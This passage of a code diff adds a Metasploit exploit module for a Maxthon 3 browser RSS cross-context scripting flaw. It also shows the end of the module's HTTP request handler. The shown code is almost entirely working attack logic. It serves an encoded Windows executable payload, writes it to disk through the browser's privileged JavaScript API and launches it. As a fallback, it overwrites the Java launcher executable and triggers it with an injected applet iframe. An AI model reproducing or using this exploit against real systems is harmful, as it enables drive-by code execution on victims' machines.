+
+ ^
+
+ case request.uri
+ when /[?]jspayload/
+ p = regenerate_payload(cli)
+ if (p.nil?)
+ send_not_found(cli)
+ return
+ end
+ # We're going to run this through unescape(), so make sure
+ # everything is encoded
+ penc = Msf::Util::EXE.to_win32pe(framework, p.encoded)
+ penc2 = Rex::Text.encode_base64(penc)
+ # now this is base64 encoded payload which needs to be passed to the file write api in maxthon
+ # depending on maxthon version, then file can be launched via Program DOM API
+ # or replacing Java program
+ content =
+ %Q{
+ var fileTemp = new maxthon.io.File.createTempFile("test","exe");
+ var fileObj = maxthon.io.File(fileTemp);
+ maxthon.io.FileWriter(fileTemp);
+
+
+ if(maxthon.program)
+ {
+ maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
+ maxthon.program.Program.launch(fileTemp.name_,"C:");
+ }
+
+ else
+ {
+ // here we need to take a dirty approach, we need to overwrite an existing exe and then invoke it
+ // this is because the maxthon.program object has been silently removed in latest Maxthon versions...
+ // in WindowsXP, any exe can be overwritten, then a simple call to a uri scheme can invoke the exe
+ // e.g. wab.exe invoked via mailto://
+ // however, in win7, a prompt will be displayed if browser executes a mail client or an external program
+ // so a common way to exploit would be to overwrite the j2plauncher.exe, which calls java.exe when applet is found
+ // once that is done, then we can point to a page where a java applet exists which will invoke java.exe,
+ // unless previously loaded by the user
+ //
+ fileTemp.name_ = "#{jpath}";
+ maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
+
+ a=document.createElement("iframe");
+ a.setAttribute("src","#{javaurl}");
+ document.body.appendChild(a)
+
+ }
+
+ }
+
+ when /[?]history/
+ js = %Q^
+ window.onload = function() {
+ location.href = "about:history";
+ }
+ ^
+ content = %Q^
+ #{html_hdr}
+
+ #{html_ftr}
+ ^
+ when get_resource()
+ print_status("Sending #{self.name} payload for request #{request.uri}")
+
+ js = %Q^
+
+ url = location.href;
+ url2 = url + "?jspayload=1";
+
+ inj = "?history#%22/>
+ #{js}
+
+ #{html_ftr}
+ ^
+ else
+ print_status("Sending 404 for request #{request.uri}")
+ send_not_found(cli)
+ return
+ end
+
+ send_response_html(cli, content, headers)
+ handler(cli)
+ end
+
+end
diff --git a/modules/exploits/windows/browser/maxthon_rss_xcs.rb b/modules/exploits/windows/browser/maxthon_rss_xcs.rb
new file mode 100644
index 0000000000..a5133482eb
--- /dev/null
+++ b/modules/exploits/windows/browser/maxthon_rss_xcs.rb
@@ -0,0 +1,114 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Maxthon RSS Preview',
+ 'Description' => %q{
+ RSS feed content is rendered by Maxthon in a trusted/privileged zone.
+ Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands.
+ Affects Maxthon 3 browsers.
+ },
+ 'License' => BSD_LICENSE,
+ 'Author' =>
+ [
+ 'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module
+ ],
+ 'Version' => '$Revision: 1 $',
+ 'References' =>
+ [
+ ['CVE', 'TBA'],
+ ['URL', 'http://blog.malerisch.net/2012/11/maxthon-cross-context-scripting-xcs-rss-rce.html'],
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ },
+ 'Targets' =>
+ [
+ ['Maxthon 3',
+ {
+ 'Platform' => 'win',
+ }
+ ],
+ ],
+
+ 'DisclosureDate' => 'Nov 26 2012',
+
+ 'DefaultTarget' => 0
+
+ ))
+
+ register_options(
+ [
+ OptString.new('JPATH', [true, "Java executable path to overwrite", 'C:\\\\Program\\ Files\\\\Java\\\\jre7\\\\bin\\\\jp2launcher.exe']),
+ OptString.new('JAVAURL', [true, "Java Applet URL", 'http://profs.etsmtl.ca/mmcguffin/learn/java/01-drawingLines/']),
+ ], self.class
+
+ )
+
+
+ end
+
+ def on_request_uri(cli, request)
+
+ jpath = datastore['JPATH']
+ javaurl = datastore['JAVAURL']
+
+ headers = {}
+ html_hdr = %Q^
+
+
+ Loading
+ ^
+ html_ftr = %Q^
+
+
+